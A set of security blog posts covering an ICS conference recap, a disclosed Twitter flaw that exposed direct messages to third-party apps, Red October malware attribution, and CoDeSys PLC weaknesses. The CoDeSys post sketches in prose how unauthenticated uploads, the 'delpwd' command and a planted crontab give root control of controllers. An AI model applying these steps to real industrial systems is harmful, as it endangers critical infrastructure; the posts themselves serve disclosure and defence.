Luigi Auriemma and his colleague Donato Ferrante demonstrated their own binary patching system, which allows them to patch applications while they are executing. The technology shows a lot of promise. They are currently marketing it as a way to provide patches for unsupported software. I think that the true potential of their system is to patch industrial systems without shutting down the process. It may take a while for any vendor to adopt this technique, but it could be a powerful motivator to get end users to apply patches. Scheduling an outage window is the most-cited reason for not patching industrial systems, and ReVuln is showing that we can work around this limitation.

 

My favorite talk was one that was only semi-technical in nature and more defensive than offensive. It was about implementing an SDL and a fuzz-testing strategy at OSISoft. OSISoft’s PI server is the most frequently used data historian for industrial processes. Since C-level employees want to keep track of how their process is doing, historical data often must be exported from the control systems network to the corporate network in some fashion. In the best case scenario, this is usually done by way of a PI Server in the DMZ. In the worst case scenario, a corporate system will reach into the control network to communicate with the PI server. Either way, the result is the same: PI is a likely target if an attacker wants to jump from the corporate network to the control network. It is terrific and all too rare still to see a software company in ICS sharing their security experiences.

 

Digital Bond provides a nice “by the numbers” look at the conference.
If you are technical and international minded and want to talk to actual ICS operators, S4 is a great place to start.
INSIGHTS | January 22, 2013

You cannot trust social media to keep your private data safe: Story of a Twitter vulnerability

I‘m always worried about the private information I have online. Maybe this is because I have been hacking for a long time, and I know everything can be hacked. This makes me a bit paranoid. I have never trusted web sites to keep my private information safe, and nowadays it is impossible to not have private information published on the web, such as a social media web site. Sooner or later you could get hacked, this is a fact.

 

Currently, many web and mobile applications give users the option to sign in using their Twitter or Facebook account. Keeping in mind the fact that Twitter currently has 200 million active monthly users (http://en.wikipedia.org/wiki/Twitter), it makes a lot of sense for third-party applications to offer users an easy way to log in. Also, since applications can obtain a wealth of information from your Twitter or Facebook account, most of the time you do not even need to register. This is convenient, and it saves time signing into third-party applications using Twitter or Facebook.

 

 

Every time I’m asked to sign in using Twitter or Facebook, my first thought is, “No way!”  I don’t want to give access to my Twitter and Facebook accounts regardless of whether I have important information there or not. I always have an uneasy feeling about giving a third-party application access to my accounts due to the security implications.

 

Last week I had a very interesting experience.

I was testing a web application that is under development. This application had an option to allow me to sign into Twitter. If I selected this option, the application would have access to my Twitter public feed (such as reading Tweets from my timeline and seeing who I follow). In addition, the application would have been able to access Twitter functionality on my behalf (such as following new people, updating my profile, posting Tweets for me). However, it wouldn’t have access to my private Twitter information (such as direct messages and more importantly my password). I knew this to be true because of the following information that is displayed on Twitter’s web page for “Signing in with Twitter”:

 

Image 1

 

After viewing the displayed web page, I trusted that Twitter would not give the application access to my password and direct messages. I felt that my account was safe, so I signed in and played with the application. I saw that the application had the functionality to access and display Twitter direct messages. The functionality, however, did not work, since Twitter did not allow the application to access these messages. In order to gain access, the application would have to request proper authorization through the following Twitter web page:

 

  Image2

 

The web page displayed above is similar to the previous web page (Image 1). However, it also says the application will be able to access your direct messages. Also, the blue button is different. It says “Authorize app” instead of “Sign in”. While playing with the application, I never saw this web page (image 2). I continued playing with the application for some time, viewing the functionality, logging in and out from the application and Twitter, and so on. After logging in to the application, I suddenly saw something strange. The application was displaying all of my Twitter direct messages. This was a huge and scary surprise. I wondered how this was possible. How had the application bypassed Twitter’s security restrictions? I needed to know the answer.

 

My surprise didn’t end here. I went to https://twitter.com/settings/applications to check the application settings. The page said “Permissions: read, write, and direct messages”. I couldn’t understand how this was possible, since I had never authorized the application to access my “private” direct messages. I realized that this was a huge security hole.

 

I started to investigate how this could have happened. After some testing, I found that the application obtained access to my private direct messages when I signed in with Twitter for a second or third time. The first time I signed in with Twitter on the application, it only received read and write access permissions. This gave the application access to what Twitter displays on its “Sign in with Twitter” web page (see image 1). Later, however, when I signed in again with Twitter without being already logged in to Twitter (not having an active Twitter session – you have to enter your Twitter username and password), the application obtained access to my private direct messages. It did so without having authorization, and Twitter did not display any messages about this. It was a simple bypass trick for third-party applications to obtain access to a user’s Twitter direct messages.

 

In order for a third-party application to obtain access to Twitter direct messages, it first has to be registered and have its direct message access level configured here: https://dev.twitter.com/apps. This was the case for the application I was testing.  In addition and more importantly, the application has to obtain authorization on the Twitter web page (see Image 2) to access direct messages. In my case, it never got this. I never authorized the application, and I did not encounter a web page requesting my authorization to give the application access to my private direct messages.

 

I tried to quickly determine the root cause, although I had little time. However, I could not determine this. I therefore decided to report the vulnerability to Twitter and let them do a deeper investigation. The Twitter security team quickly answered and took care of the issue, fixing it within 24 hours. This was impressive. Their team was very fast and responsive. They said the issue occurred due to complex code and incorrect assumptions and validations.

 

While I think the Twitter security team is great, I do not think the same of the Twitter vulnerability disclosure policy. The vulnerability was fixed on January 17, 2013, but Twitter has not issued any alerts/advisories notifying users.

 

There should be millions of Twitter users (remember Twitter has 200 million active users) that have signed in with Twitter into third-party applications. Some of these applications might have gained access to and might still have access to Twitter users private direct messages (after the security fix the application I tested still had access to direct messages until I revoked it).

 

Since Twitter, has not alerted its users of this issue, I think we all need to spread the word. Please share the following with everyone you know:

Check third-party applications permissions here: https://twitter.com/settings/applications

If you see an application that has access to your direct messages and you never authorized it, then revoke it immediately.

 

Ironically, we could also use Twitter to help users. We could tweet the following:

Twitter shares your DMs without authorization, check 3rd party application permissions  https://ioactive.com/you-can-not-trust-social-media-twitter-vulnerable/ #ProtectYourPrivacy (Please RT)

 

I love Twitter. I use it daily. However, I think Twitter still needs a bit of improvement, especially when it comes to alerting its users about security issues when privacy is affected.

 

INSIGHTS | January 21, 2013

When a Choice is a Fingerprint

We frequently hear the phrase “Attribution is hard.” And yes, if the adversary exercises perfect tradecraft, attribution can be hard to the point of impossible. But we rarely mention the opposite side of that coin, how hard it is to maintain that level of tradecraft over the lifetime of an extended operation. How many times out of muscle memory have you absent-mindedly entered one of your passwords in the wrong application? The consequences of this are typically nonexistent if you’re entering your personal email address into your work client, but they can matter much more if you’re entering your personal password while trying to log into the pwned mail server of Country X’s Ministry of Foreign Affairs. People make mistakes, and the longer the timeframe, the more opportunities they have to do so.

This leads me to the recent release from Kaspersky labs, about a malware campaign referred to as “Red October”, which they have attributed to Russian hackers. There are a number of indications pointing to Russian origination, including Russian words in the source code,  a trojan dropper that enables Cyrillic before installation, and targets concentrated in Russia’s sphere of influence. Although Kaspersky has avoided naming the sponsor of the campaign as the Russian government, the targets of the malware are strongly suggestive of government sponsorship. The campaign seemed to selectively target governments, diplomatic facilities, defense, research institutes, etc. These are targets consistent with sponsors seeking geo-political intelligence, not criminals seeking profit. Kaspersky hypothesizes the perpetrators may have collected the data to sell it, but I would argue that this is fallacious. The customer of this information would be a government, and if a government is paying criminals for the information, I would argue that’s state-sponsorship.
With that context, the one datapoint that was most interesting to me in Kaspersky’s release was the inclusion of the word, “zakladka”. As Kasperky mentions in their report, “Zakladka” is a Russian word that can mean “bookmark.” In slang it can also mean “Undocumented feature” or a brick with an embedded microphone, like the kind you would sneak into an adversary nation’s embassy.
It’s delightfully poetic then, that in a piece of malware apparently intended to target embassies someone (presumably Russian) would choose to name a module “zakladka.” The United States and Russia have a rich history of attempting to bug each other’s diplomatic facilities. As early as 1945 the Soviet Union infiltrated an ingenuous listening device into the office of the US ambassador to Moscow, hiding it in a wooden US Seal presented as a gift [1]. By 1964 the Soviets were able to collect extensive classified information from the US embassy through hidden microphones [2]. In 1985 construction work stopped on a new US Embassy building in Moscow after it was determined that the building was so riddled with microphones, which had been integrated into the construction, that it could never be considered secure [3].
Presumably in homage to this history, a programmer decided to name his module of code “zakladka”, which would be included in malware that is effectively the evolution of a microphone hidden in drywall. Zakladka is an appropriate name, but the very elegance with which its name matches
its function undermines the deniability of the malware. In this case, it was a choice made by a programmer years ago, and it has repercussions as forensic experts attempt to unravel the source of the malware today.
It’s a reminder of how humans make mistakes. Defenders often talk about the difficulty of attribution, but as the offense we seldom talk about the challenge in gaining and maintaining network access on a target system while remaining totally unnoticed. We take it for granted.
Seemingly innocuous decisions made days, weeks, or months ago can unravel what was otherwise sound tradecraft. In this case, I just found it fascinating that the choice of name for a module–an elegantly appropriate choice–can be as strong a fingerprint for attribution as anything else.
INSIGHTS | October 30, 2012

3S Software’s CoDeSys: Insecure by Design

My last project before joining IOActive was “breaking” 3S Software’s CoDeSys PLC runtime for Digital Bond.

Before the assignment, I had a fellow security nut give me some tips on this project to get me off the ground, but unfortunately this person cannot be named. You know who you are, so thank you, mystery person.

The PLC runtime is pretty cool, from a hacker perspective. CoDeSys is an unusual ladder logic runtime for a number of reasons.

 

Different vendors have different strategies for executing ladder logic. Some run ladder logic on custom ASICs (or possibly interpreter/emulators) on their PLC processor, while others execute ladder logic as native code. For an introduction to reverse-engineering the interpreted code and ASIC code, check out FX’s talk on Decoding Stuxnet at C3. It really is amazing, and FX has a level of patience in disassembling code for an unknown CPU that I think is completely unique.

 

CoDeSys is interesting to me because it doesn’t work like the Siemens ladder logic. CoDeSys compiles your ladder logic as byte code for the processor on which the ladder logic is running. On our Wago system, it was an x86 processor, and the ladder logic was compiled x86 code. A CoDeSys ladder logic file is literally loaded into memory, and then execution of the runtime jumps into the ladder logic file. This is great because we can easily disassemble a ladder logic file, or better, build our own file that executes system calls.

 

I talked about this oddity at AppSec DC in April 2012. All CoDeSys installations seem to fall into three categories: the runtime is executing on top of an embedded OS, which lacks code privilege separation; the runtime is executing on Linux with a uid of 0; or the runtime is executing on top of Windows CE in single user mode. All three are bad for the same reasons.

 

All three mean of course that an unauthenticated user can upload an executable file to the PLC, and it will be executed with no protection. On Windows and Linux hosts, it is worse because the APIs to commit Evil are well understood.

 

 I had said back in April that CoDeSys is in an amazing and unique position to help secure our critical infrastructure. Their product is used in thousands of product lines made by hundreds of vendors. Their implementation of secure ladder logic transfer and an encrypted and digitally signed control protocol would secure a huge chunk of critical infrastructure in one pass.

 

3S has published an advisory on setting passwords for CoDeSys as the solution to the ladder logic upload problem. Unfortunately, the password is useless unless the vendors (the PLC manufacturers who run CoDeSys on their PLC) make extensive modification to the runtime source code.

 

Setting a password on CoDeSys protects code segments. In theory, this can prevent a user from uploading a new ladder logic program without knowing the password. Unfortunately, the shell protocol used by 3S has a command called delpwd, which deletes the password and does not require authentication. Further, even if that little problem was fixed, we still get arbitrary file upload and download with the privileges of the process (remember the note about administrator/root?). So as a bad guy, I could just upload a new binary, upload a new copy of the crontab file, and wait patiently for the process to execute.

 

The solution that I would like to see in future CoDeSys releases would include a requirement for authentication prior to file upload, a patch for the directory traversal vulnerability, and added cryptographic security to the protocol to prevent man-in-the-middle and replay attacks.